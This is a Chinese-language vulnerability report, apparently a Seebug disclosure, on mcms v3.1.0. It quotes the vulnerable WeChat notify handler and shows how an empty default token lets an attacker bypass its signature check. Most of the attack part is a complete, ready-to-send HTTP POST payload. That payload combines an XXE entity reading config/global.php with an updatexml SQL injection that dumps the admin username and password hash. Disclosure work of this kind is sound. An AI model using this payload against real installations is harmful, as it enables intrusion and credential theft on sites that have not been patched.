mcms v3.1.0 sql注入+任意文件读取。

### 简要描述： rt。打包 ### 详细说明： app/weixin/notify.php ``` $wx=new weixin(); if($wx->check_signature()){ //用于更改通知地址 if(isset($_GET["echostr"])) die($_GET["echostr"]); //被动响应消息和事件 response_msg(); } function response_msg(){ global $dbm,$C; $postStr = $GLOBALS["HTTP_RAW_POST_DATA"]; if(!empty($postStr)){ $postObj = simplexml_load_string($postStr, 'SimpleXMLElement', LIBXML_NOCDATA); $fromUsername = $postObj->FromUserName; $toUsername = $postObj->ToUserName; $time = time(); //响应文本消息 $keyword = trim($postObj->Content); $textTpl = "<xml> <ToUserName><![CDATA[%s]]></ToUserName> <FromUserName><![CDATA[%s]]></FromUserName> <CreateTime>%s</CreateTime> <MsgType><![CDATA[%s]]></MsgType> %s </xml>"; if(!empty($keyword)){ $msgType = "text"; $contentStr=''; //查询自动回复表 $rs=$dbm->query("select * from ".TB_PRE."weixin_auto_msg where find_in_set('".$keyword."',msg_key)"); if($rs['error']==''){ ......................... ............................. $contentStr='<Content><![CDATA['.$rs['error'].']]></Content>'; } $resultStr = sprintf($textTpl, $fromUsername, $toUsername, $time, $msgType, $contentStr); echo $resultStr; } ``` 一个典型的xml实体注入。 看到check_signature()。 class/weixin.class.php ``` public function check_signature(){ $signature = isset($_GET["signature"])?$_GET["signature"]:''; $timestamp = isset($_GET["timestamp"])?$_GET["timestamp"]:''; $nonce = isset($_GET["nonce"])?$_GET["nonce"]:''; $token = WX_TOKEN; $tmpArr = array($token, $timestamp, $nonce); sort($tmpArr,SORT_STRING); $tmpStr = implode( $tmpArr ); $tmpStr = sha1( $tmpStr ); if( $tmpStr == $signature ){ return true; }else{ return false; } } ``` 由于 WX_TOKEN 默认为空，所以我访问 ``` /app/weixin/notify.php?signature=da39a3ee5e6b4b0d3255bfef95601890afd80709 ``` 该程序安装时会强制要求用户改变后台路径，但是其路径会储存在 www/config/global.php里面。配合读取任意文件读取。 完整的post包 ``` POST /app/weixin/notify.php?signature=da39a3ee5e6b4b0d3255bfef95601890afd80709 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Cookie: X-Forwarded-For: 127.x'.x.x.1 Connection: keep-alive Content-Type: text/xml Content-Length: 377 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE copyright [ <!ENTITY test SYSTEM "php://filter/read=convert.base64-encode/resource=file:///D:/Wamp/www/config/global.php"> ]> <xml> <ToUserName>&test;</ToUserName> <Content>123',msg_key) and 1=updatexml(1,concat(0x5c,(select concat(login_name,0x5c,login_pass) from mcms_user where login_level='100')),1)#</Content> </xml> ``` [<img src="https://images.seebug.org/upload/201501/10100114556f9f0b94ae45d47ba36fcab3b24caa.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/10100114556f9f0b94ae45d47ba36fcab3b24caa.png) 注入出了数据，同时读出了文件内容，将base64解码 即可得到后台路径 [<img src="https://images.seebug.org/upload/201501/10100241971fc23c72c3c7a00e47d950ce9250a5.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/10100241971fc23c72c3c7a00e47d950ce9250a5.png) ### 漏洞证明： [<img src="https://images.seebug.org/upload/201501/10100114556f9f0b94ae45d47ba36fcab3b24caa.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/10100114556f9f0b94ae45d47ba36fcab3b24caa.png)